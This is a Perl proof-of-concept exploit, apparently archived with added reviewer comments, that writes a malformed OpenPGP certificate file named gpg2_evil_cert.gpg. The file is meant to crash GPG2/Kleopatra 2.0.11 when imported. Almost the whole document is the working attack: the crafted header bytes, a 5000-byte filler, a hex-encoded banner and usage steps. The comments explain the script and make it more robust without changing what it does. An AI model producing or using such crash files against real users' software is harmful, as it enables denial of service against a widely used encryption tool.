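#!/usr/bin/perl
# GPG2/Kleopatra 2.0.11 - Malformed Certificate Crash PoC
# Exploit based on Dr_IDE.
# Tested on: 7RC, XPSP3
#
# Coded by Oscar Marques aka F-117.
# www.dunkelheit.com.br
# 22/10/09.
# Exploit usage: Generate cert, import it into Kleopatra, GPG2.exe crashes.
#
# md5: 763c0e9bdf0ad333828193fbf45204fe gpg2_evil_cert.gpg
#
# What the script does: writes a 5011-byte file (11 header bytes followed by
# 5000 bytes of 0x41) to gpg2_evil_cert.gpg in the current directory.
# The md5 above is the author's hash for that file and can serve as an
# indicator when looking for copies of this sample.
# NOTE(review): the leading 0x99 byte matches the tag of an old-format OpenPGP
# public-key packet (RFC 4880); the header does not state the root cause of
# the crash, so none is asserted here.

use strict;
use warnings;

# Script version ("versao"); not referenced anywhere else in this listing.
my $VERSAO = '0.1';

# Ignore the same signals the original ignored. The original also set
# $SIG{'PS'}, which is not a signal name; the 'exists' guard skips any name
# this platform's %SIG does not know, so nothing warns under 'use warnings'.
for my $signal_name (qw(INT HUP TERM CHLD)) {
    $SIG{$signal_name} = 'IGNORE' if exists $SIG{$signal_name};
}

# Name of the generated sample, as given in the header's md5 line.
my $output_file = 'gpg2_evil_cert.gpg';

# File contents: fixed 11-byte header plus 5000 'A' filler bytes.
my $buffer = "\x99\x03\x2E\x04\x4A\xDC\xA8\x29\x11\x08\x20" . "\x41" x 5000;

# Print the tool banner. The escaped string decodes to:
#   GPG2/Kleopatra 2.0.11 - Malformed Certificate Crash PoC
#   Coded by F-117.
sub banner {
    print("\x47\x50\x47\x32\x2f\x4b\x6c\x65\x6f\x70\x61\x74\x72\x61\x20\x32\x2e\x30\x2e\x31\x31\x20\x2d\x20\x4d\x61\x6c\x66\x6f\x72\x6d\x65\x64\x20\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x65\x20\x43\x72\x61\x73\x68\x20\x50\x6f\x43\n\x43\x6f\x64\x65\x64\x20\x62\x79\x20\x46\x2d\x31\x31\x37\x2e\n\n");
    return;
}

banner();

# Three-argument open with a lexical handle; ':raw' keeps the bytes exactly as
# built (the payload has no newline, so the written bytes are unchanged by it).
# The original never checked open/print/close and announced success even when
# the file could not be created; each step now fails loudly instead.
open(my $out, '>:raw', $output_file)
    or die "[-] Cannot create $output_file: $!\n";
print {$out} $buffer
    or die "[-] Cannot write $output_file: $!\n";
close($out)
    or die "[-] Cannot close $output_file: $!\n";

print("[+] File created successfully. Import it.\n");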